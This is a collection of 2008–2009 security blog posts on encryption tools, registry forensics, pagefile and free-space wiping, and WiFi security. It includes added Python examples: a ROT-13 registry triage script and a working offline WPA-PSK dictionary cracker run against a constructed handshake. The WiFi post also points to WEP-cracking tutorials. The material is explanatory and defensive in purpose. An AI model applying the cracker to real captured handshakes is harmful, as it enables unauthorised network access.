Security Corner:

Encryption

Jun 24 2009   5:45PM GMT

FAA Gives PKWare’s SecureZip Stamp of Approval



Posted by: Ken Harthun
Security, Encryption, Secure Computing, InfoSec

It doesn’t surprise me that the inventor of the ZIP file format was recently awarded a large enterprise
software license and maintenance agreement from the Federal Aviation Administration (FAA). What does surprise me is that with my network of security news sources, I hadn’t heard about this product before now.  Granted, I’m mostly an Open Source guy and SecureZIP is commercial software ($39.95 for a single-user license), but I was asleep on this one.

PKWARE’s SecureZIP software will initially be deployed across 50,000 Microsoft Windows® desktops
at the FAA and Department of Transportation (DOT).

I like the way SecureZIP leverages PKI. It enables users to secure files and folders with strong passphrase-based or digital certificate-based encryption. It also supports digital signatures, so a recipient can verify who produced an archive and that it hasn't been altered in transit. SecureZIP makes acquiring and using a digital certificate simple: upon installation, SecureZIP will automatically request and install (if desired) a digital certificate from Comodo.

I like AxCrypt and have been using it for quite some time for simple security. AxCrypt doesn’t offer compression, however, so you have to create an archive first, then encrypt it. Moreover, you can’t use certificates or employ digital signatures. SecureZIP is a clear winner for robust security with compression.

I’m headed over there right now to get an evaluation version.

Jun 18 2009   9:29PM GMT

How to Use the Windows Registry for Cyber Forensics: Part 2



Posted by: Ken Harthun
Cyber Forensics, Cybercrime, Encryption, Intrusion detection, Hacking

In Part 1 of this series, I introduced you to the concept of date/time coincidence and we explored five registry keys that are useful to the forensic examiner. This time, I’ll show you how data can be encrypted and hidden in the registry.

If you’re involved in data security, you’re familiar with cryptography in some fashion and you know that ciphers - the algorithms that perform encryption and decryption - are what do the work. You probably also know that there are a few quick-and-dirty ways to scramble data. One is the Caesar cipher, of which ROT-13 is the best-known instance: it shifts each letter 13 places in the alphabet and leaves digits, punctuation and everything else untouched. Because 13 is half of 26, applying the shift twice restores the original, so the same operation both encodes and decodes and there is no key at all; this is obfuscation, not encryption. It’s so simple that you can decode it by hand, but it’s enough to fool the casual observer. Anyone coming across something like cnffj beqsb egurf rperg svyrf vfcnf fjbeq is naturally going to assume it’s encrypted; in fact, it’s ROT-13 for “password for the secret files is password”. I broke it up into five-character groups to make it more convincing.

For whatever reason, Microsoft uses ROT-13 to obscure value names in some registry keys (presumably so that plain string searches don’t trip over them). One such key is HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist. Here’s an example of a value name from it: “HRZR_EHACNGU:P:\AFYBBXHC.RKR”. Decoded, that’s “UEME_RUNPATH:C:\NSLOOKUP.EXE”. (We’ll look at the UserAssist key in Part 3.) A better way to hide data is to encode text-based information in binary form and store it in a registry value of type REG_SZ or REG_BINARY. Given how much binary data the registry already holds, such a blob draws no attention on casual inspection, and an examiner who doesn’t know the encoding has a hard time recognizing it as hidden information at all. Keep in mind, though, that a fixed encoding is trivially reversible once it is recognized; like ROT-13, it hides data rather than protecting it.

In addition to using ROT-13 and binary encoding to obfuscate data, a suspect could take advantage of a flaw in the registry editor to also make the data invisible to anyone but a forensics examiner who knows about the flaw. From “Forensic Analysis of the Windows Registry:”

The Windows 2000 and XP Registry Editors (regedit.exe or regedt32.exe) have an implementation flaw that allows hiding of registry information from viewing and editing, regardless of the user’s access privileges (Secunia, 2005). The flaw involves any registry value with a name from 256 to 259 (the maximum value name length) characters long. The overly long registry value (regardless of type) not only hides its own presence, but also subsequently created values (regardless of type) in the same key (Franchuk, 2005). The editor stops displaying the remaining values, taking the overly long value as the last value in that key. A suspect could exploit such a Registry Editor flaw to hide information.

The Windows console registry tool (reg.exe) enumerates values without this bug, so a recursive listing such as reg query HKCU\Software /s will show the overly long name and every value created after it, and the hidden data can be recovered as evidence. Forensic tools that parse the hive files directly from a disk image are likewise unaffected, since the flaw lives in the editor’s display code, not in the registry itself. Given the sheer number of entries in the registry, however, spotting such values without a targeted check (for instance, flagging every value name of 256 characters or more) is not trivial.
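The following is an added example, not code from the original post, that puts the two points above into practice: it decodes ROT-13 value names of the UserAssist style (including the five-character grouping trick from the earlier paragraph), and it applies the rule quoted from the advisory (a value name of 256 characters or more hides itself and everything created after it) to a list of values in creation order. The sample key, its value names and its data are constructed for the example; the 16-byte blobs stand in for real UserAssist counters and are not real data.

```python
import string

# ROT-13 translation table: the two halves of the alphabet swapped, for both cases.
_ROT13 = str.maketrans(
    string.ascii_uppercase + string.ascii_lowercase,
    string.ascii_uppercase[13:] + string.ascii_uppercase[:13]
    + string.ascii_lowercase[13:] + string.ascii_lowercase[:13],
)

REGEDIT_HIDE_THRESHOLD = 256  # value-name length that trips the 2000/XP regedit flaw


def rot13(text: str) -> str:
    """Shift each letter 13 places; digits, punctuation and backslashes are
    untouched. The shift is its own inverse, so this both encodes and decodes."""
    return text.translate(_ROT13)


def decode_grouped(cipher_text: str) -> str:
    """Undo the five-character grouping trick: drop the spacing, then ROT-13.
    The grouping destroyed the word boundaries, so the plaintext comes back as
    one unbroken run of letters."""
    return rot13(cipher_text.replace(" ", ""))


def regedit_hidden(values):
    """Names that regedit.exe/regedt32.exe on 2000/XP would not display.

    `values` is a list of (name, reg_type, data) tuples in creation order: the
    editor stops enumerating at the first over-long name, so that value and
    everything created after it vanish from view."""
    hidden, tripped = [], False
    for name, _reg_type, _data in values:
        tripped = tripped or len(name) >= REGEDIT_HIDE_THRESHOLD
        if tripped:
            hidden.append(name)
    return hidden


def triage(values):
    """One row per value: the ROT-13 reading of UserAssist-style names (XP-era
    names start with the encoded prefix HRZR_) and of string data, plus whether
    regedit would have shown the value at all."""
    hidden = set(regedit_hidden(values))
    rows = []
    for name, reg_type, data in values:
        rows.append({
            "name": name,
            "decoded_name": rot13(name) if name.startswith("HRZR_") else name,
            "rot13_data": rot13(data) if reg_type == "REG_SZ" else None,
            "hidden_from_regedit": name in hidden,
        })
    return rows


# Constructed sample key in creation order (made up for this example).
SAMPLE_KEY = [
    ("HRZR_EHACNGU:P:\\AFYBBXHC.RKR", "REG_BINARY", b"\x00" * 16),
    ("HRZR_EHACNGU:P:\\JVAQBJF\\FLFGRZ32\\PZQ.RKR", "REG_BINARY", b"\x00" * 16),
    ("A" * 257, "REG_SZ", "regedit never shows this value"),
    ("Notes", "REG_SZ", "cnffj beqsb egurf rperg svyrf vfcnf fjbeq"),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_KEY):
        flag = "HIDDEN " if row["hidden_from_regedit"] else "visible"
        print(f"{flag} {row['decoded_name'][:60]!r} data={row['rot13_data']!r}")
```

Run as a script it prints one line per value; the third and fourth rows come out flagged HIDDEN, which is exactly what an examiner relying on regedit would have missed. On a real system, feed the function the output of reg query or a hive parser rather than the constructed list.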

I hope this series is giving you some insight, perhaps even piquing your interest, in cyber forensics. Hit the comment button and tell me what you think.

In Part 3, we’ll explore some keys that can tell us where a suspect has been storing files.


Mar 24 2009   6:47PM GMT

Pagefile.sys is a Security Risk



Posted by: Ken Harthun
Security, Secure Computing, Security management, Encryption, Memory

Since the early days of Windows (3.x and forward), the operating system has relied upon virtual memory, in the form of a file on the hard drive, to extend the machine’s physical memory. When physical memory begins filling up, pages of data are moved from RAM to that file. Until Windows NT, this file was called win386.swp; with NT it became pagefile.sys. While the pagefile generally enhances performance, it’s a security risk.

For one thing, Windows’ default behavior leaves the pagefile intact when a user logs out and across reboots, so fragments of whatever the user worked with while logged in (document contents, passwords held in memory by applications, and so on) can remain on disk and be read by anyone who can get at the raw drive.

Encryption doesn’t necessarily mean the data is safe, either. The file on disk is encrypted, but to work with it the system must first decrypt it in memory, and those plaintext pages can be swapped out to the pagefile just like any others.

There’s a simple registry setting that will overwrite your pagefile when you shut down your computer. Why this setting isn’t enabled by default only makes sense from a performance standpoint: a large pagefile can add noticeable time to shutdown, but you’ll rest easier knowing your confidential data isn’t sitting on disk.

Start regedit and navigate to:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

Set the DWORD value ClearPageFileAtShutdown to 1 (create it if it isn’t there).

Close regedit and reboot your computer to apply the change.

Two caveats. The pagefile is only cleared on a clean shutdown, so a machine that is stolen while running, asleep, or after a crash still has its pagefile intact. And hibernation writes the entire contents of RAM to hiberfil.sys, which this setting doesn’t touch; disable hibernation, or use full-disk encryption, if that matters to you.


Mar 20 2009   1:35AM GMT

Another Little Known Tool to Securely Delete Files, Folders, and Volumes



Posted by: Ken Harthun
Cryptography, Data destruction, Data sanitization, Security, Encryption, Security management, Opinion, Secure drive wipe

Why, all of a sudden, is everyone concerned about secure file deletion? I hesitate to say it’s a sign of the poor economy, but perhaps people consider it even more important to protect their personal information when the idea of losing control of their assets—and their lives–through the incompetence of corporate “managers” and well-intentioned but clueless politicians is more abhorrent than losing control through the outright thievery of Internet gangs. It’s weird. I harped on people about securing their data all along and mostly, my advice fell on deaf ears. Now people are worried. And it’s not because they see more spam email phishing attempts, it’s because they feel they can’t trust anyone anymore, not their formerly respected captains of industry, and certainly not their elected officials.

But, I digress. This post is about security tools, not politics, so I’m now officially off of my soapbox.

I recently posted an article about SDelete, a tool that can be used to securely delete files and folders on a hard drive. There’s another little known, useful tool that has been built into the OS since Windows 2000 (the /w switch arrived with Windows 2000 SP3): cipher.exe. Note what it does and doesn’t do: cipher /w overwrites only the unallocated space on the volume (three passes: zeros, ones, then random data), so it wipes the remnants of already-deleted files but does nothing to files that still exist or to the slack space at the end of them. Microsoft provides the following in Knowledge Base article 315672:

How to Use the Cipher Security Tool to Overwrite Deleted Data

To overwrite deleted data on a volume by using Cipher.exe, use the /w switch with the cipher command. Use the following steps:

  1. Quit all programs.
  2. Click Start, click Run, type cmd, and then press ENTER.
  3. Type cipher /w:driveletter:\foldername, and then press ENTER. Specify the drive and the folder that identifies the volume that contains the deleted data that you want to overwrite. Data that is not allocated to files or folders will be overwritten. This permanently removes the data. This can take a long time if you are overwriting a large space.

One more tool you can use to mollify your paranoid clients.


Feb 11 2009   10:30PM GMT

Software for Secure Computing: Easy Email & File Security with AxCrypt



Posted by: Ken Harthun
Security, Encryption, Email security, Secure Computing

Most of the email we send and receive from our co-workers, family, and businesses contains little that requires any degree of confidentiality. The same goes for most of the files we have stored on our hard drives and thumb drives. Occasionally, however, we need to pass on or store some information that wouldn’t be prudent for us to send or store in clear text, i.e., unencrypted. To go through all of the effort (and it’s a bit of effort, believe me) to set up secure email or create encrypted partitions or directories on the hard drive is a waste of time for most people. Fortunately, there’s a simple, free solution: AxCrypt.

AxCrypt is open source file encryption software for Windows. It integrates seamlessly with Windows to encrypt, decrypt, store, send and work with individual files. It runs on Windows 2000/2003/XP/Vista and uses AES-128 encryption.

Once installed, AxCrypt is integrated into Windows Explorer’s context menu. You simply right-click files and folders in Windows Explorer, select AxCrypt and then select the action you want from the sub-menu (see screen shot). If you choose Encrypt Copy to .EXE, AxCrypt makes a copy of the document, asks you for a passphrase, and creates a standalone, self-decrypting file that you can safely send across the network or store anywhere you choose.

To use AxCrypt for secure email, simply create a text file that contains all of the sensitive information you want to send, make a self-decrypting EXE file, and send it as an attachment. You’ll have to give the recipient the passphrase out of band (by phone or in person, never in the same email), but your information will be secure in transit. One practical caveat: many mail servers and clients strip or block .exe attachments outright, so if the self-decrypting file doesn’t arrive, send the ordinary encrypted .axx file instead and have the recipient install AxCrypt.

The AxCrypt site has plenty of information on how to use the program, as well as an excellent FAQ and command line reference.

Check it out. It’s a great addition to your secure computing software collection.


Nov 5 2008   9:17PM GMT

Software for Secure Computing: Ironkey



Posted by: Ken Harthun
Security, Encryption, Secure Computing

There’s an old saw in security circles: “complexity is the enemy of security.” The more complex something is, the more likely there will be flaws to exploit. Too, there are times when you just don’t need the strength of AES encryption. Case in point: the company I work for utilizes a practice management and documentation system to keep track of service tickets, inventory, server & network configurations, and other customer information. Since the software is web-based (which makes it a potential attack target),  we needed a simple method to securely store client passwords and remote access configurations. The solution was Iron Key (not to be confused with the secure flash drive of the same name), a free version of Silver Key–a program for creating self-extracting encrypted files.

The program is perfect for safely sending files over the Internet, even those that contain sensitive personal and financial information. For example, say you have an electronic copy of your tax return that you need to email to your accountant; easy, just drag and drop it onto Iron Key, set a good passphrase and send it along. Your accountant does not need any cryptographic software in order to decrypt the file; all he needs is to run the file and enter the right password, which you can tell him over the phone.

It doesn’t get much simpler than this.


Jul 5 2008   2:43PM GMT

The #1 Security Priority: Protect The Information



Posted by: Ken Harthun
Security management, Networking, Storage, Security, Encryption, Vulnerabilities, Embedded systems, Opinion, Firmware security

SANS recently reported that a Ponemon Institute survey, commissioned by Dell, found that more than 630,000 laptops are lost at airports each year, usually at security checkpoints and departure gates. A staggering 67% of them are never recovered. From SANS NewsBites Vol. 10, Num. 52:

The survey…included feedback from 864 business travelers: 53% said their laptops held confidential data; 42% said their data was not backed up; 16% said they would do nothing if they lost a laptop while traveling on business; 77% said the chance of recovering a lost laptop was less than ten percent.

Surprisingly, the SANS article made no mention that the Ponemon survey found that 65% of the travelers who have confidential or sensitive information on their laptops do nothing to attempt to protect it. The article seems to be more focused on physical security and this is indicative of a paradigm that is too heavily weighted in favor of protecting the network rather than the information traveling across it. The paradigm is shifting, but not nearly fast enough, as the survey shows.

Given the nature of operating systems and software, embedded or otherwise, there will never be a completely secure network; there will always be vulnerabilities to deal with and deal with them we must. However, the Internet is designed for sharing, not securing, a fact that’s never been more true than it is today;  with Web 2.0’s emphasis on community and collaboration, the need to protect the information is even more critical.

We can’t predict security vulnerabilities in third party software and systems, so all we can do is patch after the fact. If we make data protection the first priority and never allow a scrap of sensitive information to reside anywhere on any storage medium without it first having been encrypted or physically isolated, the severity of any newly-discovered vulnerability is greatly lessened.

What do you think?


Jun 30 2008   3:55PM GMT

Virtual Safe Deposit Box?



Posted by: Ken Harthun
Security, Encryption, DataManagement, Portable computing, Cryptography, Opinion

A bank safe deposit box, securely stored in a vault behind several feet of concrete on five sides with a virtually impenetrable combination-and-time-lock-protected door on the sixth side, is about as safe a storage place as you can get for your cash, gold, jewels, important documents, and other valuables. You rarely hear of anyone losing valuables from a safe deposit box, but there’s an almost daily news story about sensitive data being lost or stolen. This makes for an interesting thought experiment.

While it’s not possible to provide the physical security of a bank vault on a laptop or other portable storage device, it is possible to protect the information itself with encryption so that only authorized persons can access it.  Take the bank’s physical security out of the mix for a moment, making it possible for someone to walk right into the vault; they still can’t unlock your box without both the bank’s key and your key. An encrypted volume works similarly: the data is encrypted under a random master key, and that master key is itself stored encrypted under a key derived from your passphrase. Without the passphrase the stored key material is useless, and without the volume’s header the passphrase unlocks nothing.

One could say, therefore, that an encrypted volume is a virtual safe deposit box for your valuable data.


Jun 20 2008   1:02AM GMT

WiFi Security–The Only Way is WPA



Posted by: Ken Harthun
Security management, Wireless, Security, Encryption, Cryptography, Password, Security maxim

Please note: since this article was posted, WPA-TKIP has been found to be vulnerable. See my post of 2008.11.13 entitled “WPA-TKIP Vulnerable to Attack” for more information.

It’s far too easy to set up WiFi for your home or business; all you have to do is go to your local electronics superstore and pick up a wireless router, plug it in to your network, and connect to it. The default configuration of most consumer products–completely open with no security enabled–will allow you to connect without having to enter any configuration information into your wireless PC. That’s why in any given neighborhood you’ll see multiple unsecured wireless network connections available. Most public WiFi hotspots are also unsecured, open connections. If you just surf the web and send an occasional email, you might be OK (besides the fact that anyone in range can connect to and use your Internet connection), but the moment you start using your PC for banking, making purchases, and paying bills online, that wireless connection absolutely must be secured. It must be done right, and there’s really only one right way to do it. Before I explain that, let me tell you what not to do:

1. Don’t rely on SSID hiding. I’ve seen numerous articles that tout SSID hiding as a security measure (and one CISSP, no less, is recommending it!) While this technique may serve to hide your network from casual view, there’s nothing secure about it: hiding only removes the name from the access point’s beacons, and the SSID is still sent in clear text in the probe and association frames every time a client connects. A passive sniffer such as Kismet recovers the name of a “hidden” network the moment a client joins it.

2. WEP is broken. Using 40,000 to 100,000 captured packets, which can be collected in about a minute on a busy network, the PTW attack recovers a WEP key in about three seconds on a Pentium M 1.7 GHz PC. Don’t believe me? Check it out: This list even provides video tutorials on how to do it. Sure, it provides a small measure of security and it’s better than nothing, but why use something that’s already been proven inferior? Would you feel more secure knowing the garage where you store that vintage Corvette is protected by a Master lock or one you bought at an everything-for-a-dollar store? Your personal information is much more valuable than that car.

3. Don’t bother with MAC address filtering. I don’t know why so many people are recommending this. MAC address filtering is equivalent to SSID hiding–it’s virtually useless, except to keep a casual user from inadvertently connecting to your wireless network. Like the SSID, MAC addresses are sent in clear text in the header of every frame, encrypted or not, so anyone sniffing your network can read an allowed address and set it on their own card in seconds.

So, what’s the right way? WiFi Protected Access, known by its acronym, WPA, and preferably its successor, WPA2. There are two modes: WPA-Personal, which relies on a pre-shared key (PSK) derived from a passphrase, and WPA-Enterprise, which authenticates each user through an 802.1X/RADIUS server and is therefore more suited to corporate environments. WPA encrypts with TKIP (RC4 with 128-bit per-packet keys); WPA2 uses AES-CCMP, and that is what you should select if your router and clients support it. In Personal mode the security rests entirely on the passphrase: the four-way handshake that every client performs can be captured by anyone in range and then attacked offline, guess by guess, so a short or dictionary passphrase will fall. Use a long, random one (up to 63 characters are allowed) and it is effectively unbreakable. Configuring WPA-PSK on a given wireless router depends on the brand, but you can find a general tutorial at this site.
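To make the “it all rests on the passphrase” point concrete, here is an added example (not from the original post, and not code from any router vendor) that derives a WPA-Personal PSK the way 802.11i specifies and then plays the attacker against a constructed four-way handshake. The PSK derivation (PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 256-bit output), the PRF-512 expansion to the PTK and the EAPOL MIC computation are the real algorithms; the MAC addresses, nonces, EAPOL frame body and passphrases are made up for the example, and the nonces are derived from a fixed seed so the run is repeatable (real nonces are random). Nothing touches a radio.

```python
import hashlib
import hmac


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """802.11i pre-shared key: PBKDF2-HMAC-SHA1(passphrase, salt=SSID,
    4096 iterations, 32 bytes). In Personal mode this PSK is the PMK."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for
    i = 0..3, concatenated and cut to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """Pairwise transient key from the PMK plus the handshake's public values.
    Its first 16 bytes are the KCK, the key used for the EAPOL MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed. WPA2/CCMP uses
    HMAC-SHA1 truncated to 16 bytes; the original WPA/TKIP uses HMAC-MD5."""
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_frame, digest).digest()[:16]


def build_capture(passphrase: str, ssid: str, seed: bytes = b"example") -> dict:
    """Construct what a sniffer hands over after one client joins: both MACs,
    both nonces, message 2's EAPOL-Key frame with the MIC field zeroed, and the
    MIC the client transmitted. All values here are assumed for the example."""
    ap_mac = bytes.fromhex("00116b000001")   # assumed AP address
    sta_mac = bytes.fromhex("001c50000002")  # assumed client address
    anonce = hashlib.sha256(seed + b"anonce").digest()
    snonce = hashlib.sha256(seed + b"snonce").digest()
    # Simplified EAPOL-Key body: header, key info/length, replay counter,
    # SNonce, then the zeroed IV/RSC/ID/MIC/data-length fields.
    eapol = (b"\x01\x03\x00\x75\x02\x01\x0a\x00\x10" + b"\x00" * 8
             + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
             + b"\x00" * 16 + b"\x00\x00")
    ptk = derive_ptk(wpa_psk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol,
            "mic": eapol_mic(ptk[:16], eapol)}


def crack(capture: dict, wordlist):
    """Offline dictionary attack: the capture supplies everything except the
    PMK, so each guess costs one PBKDF2 run, one PRF and one HMAC, with no
    further contact with the network. Returns the passphrase or None."""
    for guess in wordlist:
        if not 8 <= len(guess) <= 63:
            continue  # cannot be a valid WPA passphrase, skip the PBKDF2 cost
        ptk = derive_ptk(wpa_psk(guess, capture["ssid"]), capture["ap_mac"],
                         capture["sta_mac"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), capture["mic"]):
            return guess
    return None


if __name__ == "__main__":
    cap = build_capture("linksys123", "HomeNet")
    print("recovered:", crack(cap, ["admin", "password", "linksys123"]))
```

The 4096 PBKDF2 rounds are the only thing slowing the attacker down, and they are no obstacle against a wordlist: a short passphrase is recovered on the first matching guess, while a long random one never appears in any list. That is the whole argument for the passphrase advice above.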

And that, my dear reader, is Maxim #13 in the How to Secure Your Computer series of articles:

When it comes to securing a WiFi network, the only way is WPA.


May 31 2008   2:13AM GMT

How to Secure Your Computer: Maxim #10



Posted by: Ken Harthun
Security management, Security, Encryption, Cryptography, Password, Security maxim

A friend of mine came up to me the other day and said, “I love your computer security maxims, but there’s one thing I don’t have anything to worry about–I keep all of my passwords stored on an encrypted thumb drive.”

“Well, that’s a good thing,” I said. “Where do you keep your backups?”

“On my external USB drive.”

“That’s encrypted, right?”

He blinked and looked away. “No.”

Doh! If a cracker is able to access his PC and that drive is connected and turned on, my friend could be toast. If someone breaks into his house and steals the drive, my friend could be toast. Depending on what is actually stored on the hard drive, full backups can contain lots of personal information–information that is much more valuable than mere passwords. Think about it: if you have the user’s name, address, SSN, pet photos, you-name-it, you’re in Fat City; you can easily assume the identity and recover usernames and passwords.

Few people encrypt their data, much less their backups. They should, but they don’t. Some backup programs allow you to make encrypted backups. If this option is available take advantage of it. The most secure plan would be to both encrypt your data and encrypt the backup for a double layer of protection. Then, take the backup media offline and store it in a secure place. And that is Maxim #10:

When using external removable media for backups, either encrypt the backup files or make sure the media is taken offline after the backup has been completed.